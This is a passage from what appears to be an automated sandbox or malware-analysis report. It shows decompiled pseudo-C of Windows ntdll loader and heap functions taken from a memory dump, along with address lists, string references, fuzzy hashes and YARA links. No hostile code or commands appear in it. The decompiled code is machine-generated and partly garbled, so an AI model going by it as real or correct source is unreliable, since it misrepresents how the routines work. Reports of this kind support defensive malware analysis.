									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01268999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01268999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1345c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1345c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01272280(_t92, 0x13486cc);
															_t94 = E01329DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012861A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1345c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01268A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1345c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1345c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0129F380(_t136, 0x1231184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01272280(_t108, 0x13486cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012861A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01329D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0126FFB0(_t118, _t156, 0x13486cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01299A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01268799
0x0126879d
0x012687a1
0x012687a3
0x012687a8
0x012687c3
0x012687c3
0x012687c8
0x012687d1
0x012687d4
0x012687d8
0x012687e5
0x012687ec
0x012b9bfe
0x012b9c00
0x012b9c02
0x012b9c08
0x012b9c0d
0x012b9c0f
0x012b9c14
0x012b9c2d
0x012b9c32
0x012b9c37
0x012b9c3a
0x012b9c3c
0x012b9c42
0x012b9c42
0x012b9c3c
0x012b9c02
0x012687da
0x012687df
0x012687e3
0x00000000
0x00000000
0x012687e3
0x012687f2
0x00000000
0x012687fb
0x012687fd
0x012687fe
0x0126880e
0x0126880f
0x01268810
0x01268814
0x0126881a
0x0126881c
0x0126881f
0x01268821
0x01268822
0x01268824
0x01268826
0x0126882c
0x0126882e
0x012b9c48
0x012b9c48
0x01268834
0x01268834
0x01268837
0x00000000
0x00000000
0x01268837
0x0126882e
0x0126883d
0x01268840
0x01268843
0x01268846
0x01268849
0x0126884c
0x0126884e
0x01268850
0x01268852
0x01268854
0x01268857
0x012688b4
0x012688b6
0x012688b6
0x01268859
0x01268859
0x01268859
0x01268861
0x01268866
0x0126886a
0x0126893d
0x01268941
0x00000000
0x01268947
0x01268947
0x0126894a
0x0126894c
0x00000000
0x01268952
0x01268955
0x0126895a
0x0126895d
0x0126895d
0x0126895f
0x01268961
0x01268961
0x01268968
0x00000000
0x00000000
0x0126896a
0x0126896b
0x0126896e
0x00000000
0x01268970
0x01268970
0x01268970
0x01268970
0x01268972
0x01268972
0x01268974
0x00000000
0x0126897a
0x0126897a
0x0126897d
0x00000000
0x01268983
0x012b9c65
0x012b9c6d
0x012b9c72
0x012b9c75
0x012b9c75
0x012b9c82
0x012b9c86
0x012b9c87
0x012b9c88
0x012b9c89
0x012b9c8c
0x012b9c90
0x012b9c95
0x012b9c97
0x012b9ca0
0x012b9ca3
0x012b9ca9
0x012b9ca9
0x00000000
0x012b9ca9
0x012b9ca3
0x00000000
0x012b9c97
0x0126897d
0x00000000
0x01268974
0x01268988
0x01268992
0x01268996
0x00000000
0x01268996
0x0126894c
0x00000000
0x01268870
0x0126887b
0x0126887d
0x0126887f
0x01268881
0x01268884
0x01268884
0x01268886
0x01268889
0x0126888c
0x0126888e
0x01268891
0x01268891
0x01268898
0x00000000
0x00000000
0x0126889a
0x0126889b
0x0126889e
0x00000000
0x00000000
0x012688a0
0x012688a8
0x012688b0
0x012688b2
0x012688d3
0x012688d5
0x00000000
0x012688d7
0x012688db
0x012688dc
0x012688e0
0x012688e8
0x012688ee
0x012688f0
0x012688f3
0x012688fc
0x01268901
0x01268906
0x0126890c
0x0126890c
0x0126890f
0x01268916
0x01268917
0x01268918
0x01268919
0x0126891a
0x0126891f
0x01268921
0x012b9c52
0x012b9c55
0x012b9c5b
0x012b9cac
0x012b9cc0
0x012b9cc0
0x012b9c55
0x01268927
0x01268927
0x0126892f
0x01268933
0x00000000
0x012688f5
0x012688f5
0x00000000
0x012688f7
0x012688f7
0x012688fa
0x00000000
0x00000000
0x00000000
0x00000000
0x012688fa
0x012688f5
0x012688f3
0x00000000
0x012688d5
0x00000000
0x012688b2
0x012688c9
0x00000000
0x012688c9
0x0126887f
0x0126886a
0x01268857
0x01268852
0x012688bf
0x012688bf
0x012687aa
0x012687ad
0x012687ae
0x012687b4
0x012687b5
0x012687b6
0x012687b8
0x012687bd
0x012687c1
0x012687f4
0x012687fa
0x00000000
0x00000000
0x00000000
0x012687c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 012B9C1E
minkernel\ntdll\ldrsnap.c, xrefs: 012B9C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 012B9C18

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: cda2ab535670e5b62e72f3f51797a37fa9b6db930399867fe6b4921a1a65216b
Instruction ID: f71ed619fc9f697147f353298202a70e09fcbdd025f3430bc2bc338412104b5f
Opcode Fuzzy Hash: cda2ab535670e5b62e72f3f51797a37fa9b6db930399867fe6b4921a1a65216b
Instruction Fuzzy Hash: 0E91F171A2031BDFEF29DF59D481ABA77B9FF84314B144169DA01AB281DB70ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01267E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01267E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0126CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0125C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1345780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E012D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1345780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01277D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01277D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E012D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01277D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01277D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E012D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0128A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0125B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01267e4c
0x01267e50
0x01267e55
0x01267e58
0x01267e5d
0x01267e71
0x01267f33
0x01267e77
0x01267e77
0x01267e79
0x01267e79
0x01267e7e
0x01267f45
0x012b9848
0x00000000
0x012b9848
0x01267f4e
0x01267f53
0x01267f5a
0x00000000
0x00000000
0x012b985a
0x012b9862
0x012b9866
0x00000000
0x012b986c
0x00000000
0x012b986c
0x01267e84
0x01267e84
0x01267e8d
0x012b9871
0x01267eb8
0x01267ec0
0x01267ec0
0x01267e9a
0x012b987e
0x00000000
0x00000000
0x012b9884
0x012b988b
0x012b98a7
0x012b98ac
0x012b98b1
0x012b98b6
0x012b98b8
0x012b98b8
0x012b98b9
0x00000000
0x012b98b9
0x01267ea0
0x01267ea7
0x00000000
0x00000000
0x01267eac
0x01267eb1
0x01267ec6
0x01267ed0
0x012b98cc
0x01267ed6
0x01267ed6
0x01267ed6
0x01267ede
0x01267ee3
0x012b98e3
0x012b98f0
0x012b9902
0x012b98f2
0x012b98fb
0x012b98fb
0x012b9907
0x012b991d
0x012b991d
0x012b9907
0x012b98e3
0x01267ef0
0x01267f14
0x01267f14
0x01267f1e
0x012b9946
0x01267f24
0x01267f24
0x01267f24
0x01267f2c
0x012b996a
0x012b9975
0x012b9975
0x012b997e
0x012b9993
0x012b9993
0x012b997e
0x00000000
0x01267ef2
0x01267efc
0x01267f0a
0x01267f0e
0x012b9933
0x00000000
0x012b9933
0x00000000
0x01267f0e
0x00000000
0x00000000
0x00000000
0x01267eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 012B98A2
LdrpCompleteMapModule, xrefs: 012B9898
Could not validate the crypto signature for DLL %wZ, xrefs: 012B9891

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 42dd95afb0ef4ff4b9e811ee899e16a47e52493e1208e2759b8a6a95c2bd7383
Instruction ID: 07493a4efd4fd00b04324c0dd947a08cb4c454960117a4777f0bea14de871de7
Opcode Fuzzy Hash: 42dd95afb0ef4ff4b9e811ee899e16a47e52493e1208e2759b8a6a95c2bd7383
Instruction Fuzzy Hash: 1851F171A20743DBEB22CB6CDD84B6A7BE8AB00758F040669EB519B3D1D774ED84C790

Uniqueness

Uniqueness Score: -1.00%

Function 0125E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0125E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0125F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E012995D0();
						}
						if(_t78 != 0) {
							L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0129FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0129BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01299600();
					if(_t97 < 0) {
						goto L6;
					}
					E0129BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0125F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0129BB40(_t83, _t102 + 0x24, _t78);
								if(L012643C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0129BB40(_t84, _t102 + 0x24, _t94);
									if(L012643C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0125e620
0x0125e628
0x0125e62f
0x0125e631
0x0125e635
0x0125e637
0x0125e63e
0x012b5503
0x012b5503
0x0125e64c
0x0125e64c
0x0125e651
0x00000000
0x00000000
0x0125e661
0x0125e665
0x012b542a
0x0125e715
0x0125e71a
0x0125e71c
0x0125e720
0x0125e720
0x0125e727
0x0125e736
0x0125e736
0x0125e743
0x0125e743
0x0125e673
0x0125e678
0x0125e67d
0x0125e682
0x0125e685
0x0125e692
0x0125e69b
0x0125e6a3
0x0125e6ad
0x0125e6b1
0x0125e6b2
0x0125e6bb
0x0125e6bf
0x0125e6c0
0x0125e6c8
0x0125e6cc
0x0125e6d5
0x0125e6d9
0x00000000
0x00000000
0x0125e6e5
0x0125e6ea
0x0125e6f9
0x0125e70b
0x0125e70f
0x012b5439
0x012b545e
0x012b545e
0x00000000
0x012b545e
0x012b543b
0x012b543e
0x012b5440
0x012b5445
0x012b5472
0x012b5475
0x012b548d
0x012b5493
0x012b54a9
0x00000000
0x00000000
0x012b54ab
0x012b54b4
0x012b54bc
0x012b54c8
0x012b54de
0x012b54fb
0x012b54e0
0x012b54e6
0x012b54eb
0x012b54eb
0x012b54de
0x00000000
0x012b54bc
0x012b5477
0x012b547a
0x012b5480
0x012b5483
0x012b5486
0x012b548b
0x00000000
0x00000000
0x00000000
0x012b548b
0x00000000
0x00000000
0x00000000
0x00000000
0x012b5447
0x012b5447
0x012b5447
0x012b5447
0x012b544e
0x00000000
0x00000000
0x012b5450
0x012b5452
0x012b5455
0x012b545a
0x00000000
0x00000000
0x00000000
0x012b545c
0x012b546a
0x012b546d
0x012b546f
0x00000000
0x012b546f
0x0125e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0125E68C
InstallLanguageFallback, xrefs: 0125E6DB
@, xrefs: 0125E6C0

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 534478269cc337ba0470091d623866a86a0ccc98d49c4e6b372e86b419973b3d
Instruction ID: b2f128859fe12d7e6b8c012545201de2d7772d05397c74654f55627fa412d079
Opcode Fuzzy Hash: 534478269cc337ba0470091d623866a86a0ccc98d49c4e6b372e86b419973b3d
Instruction Fuzzy Hash: 7B51A0715243469BD714DF28D480ABBB7E8EF98754F05092EFA85DB240F734DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0131E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0131E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0131BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0131BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0131AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01299730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0131A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0131A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01299730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0131A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0131A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01272280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0126B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0126FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01277D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0130FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0131e547
0x0131e549
0x0131e54f
0x0131e553
0x0131e557
0x0131e55a
0x0131e55c
0x0131e55f
0x0131e561
0x0131e567
0x0131e56b
0x0131e7e2
0x00000000
0x0131e571
0x0131e575
0x0131e577
0x0131e57b
0x0131e57c
0x0131e57d
0x0131e57e
0x0131e57f
0x0131e588
0x0131e58f
0x0131e591
0x0131e592
0x0131e592
0x0131e596
0x0131e59e
0x0131e5a0
0x0131e5a6
0x0131e61d
0x0131e61d
0x0131e621
0x0131e623
0x0131e630
0x0131e630
0x0131e7e6
0x0131e7eb
0x0131e7ed
0x0131e7f4
0x0131e7fa
0x0131e7ff
0x0131e7ff
0x0131e80a
0x0131e812
0x0131e812
0x0131e5ab
0x0131e5b4
0x0131e5b9
0x0131e5be
0x0131e5c0
0x0131e5c2
0x0131e5c8
0x0131e5c9
0x0131e5cb
0x0131e5cc
0x0131e5d5
0x0131e5e4
0x0131e5f1
0x0131e5f8
0x0131e5f8
0x0131e5d5
0x0131e602
0x0131e616
0x0131e63d
0x0131e644
0x0131e64d
0x0131e652
0x0131e657
0x0131e659
0x0131e65b
0x0131e661
0x0131e662
0x0131e664
0x0131e665
0x0131e66e
0x0131e67d
0x0131e68a
0x0131e691
0x0131e691
0x0131e66e
0x0131e6b0
0x00000000
0x0131e6b6
0x0131e6bd
0x0131e6c7
0x0131e6d7
0x0131e6d9
0x0131e6db
0x0131e6de
0x0131e6e3
0x0131e6f3
0x0131e6fc
0x0131e700
0x0131e700
0x0131e704
0x0131e70a
0x0131e70a
0x0131e713
0x0131e716
0x0131e719
0x0131e720
0x0131e761
0x0131e76b
0x0131e774
0x0131e77a
0x0131e77a
0x0131e78a
0x0131e791
0x0131e799
0x0131e79b
0x0131e79f
0x0131e7aa
0x0131e7c0
0x0131e7ac
0x0131e7b2
0x0131e7b9
0x0131e7b9
0x0131e7c7
0x0131e806
0x00000000
0x0131e7c9
0x0131e7d1
0x0131e7d8
0x00000000
0x0131e7d8
0x00000000
0x00000000
0x0131e722
0x0131e72e
0x0131e748
0x0131e74c
0x0131e754
0x0131e756
0x0131e75c
0x0131e75c
0x00000000
0x0131e75c
0x0131e758
0x0131e758
0x00000000
0x0131e758
0x0131e750
0x00000000
0x00000000
0x0131e752
0x00000000
0x0131e752
0x0131e730
0x0131e735
0x0131e73d
0x0131e73f
0x00000000
0x00000000
0x0131e741
0x0131e741
0x00000000
0x0131e741
0x0131e739
0x00000000
0x00000000
0x0131e73b
0x00000000
0x0131e73b
0x0131e722
0x0131e720
0x0131e6b0
0x0131e618
0x00000000
0x0131e618

Strings

`, xrefs: 0131E670
`, xrefs: 0131E5D7

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: d97c653852ee858a7e15b0a21117f9f37dc2ac1b61652f0f3271aa96110182ff
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
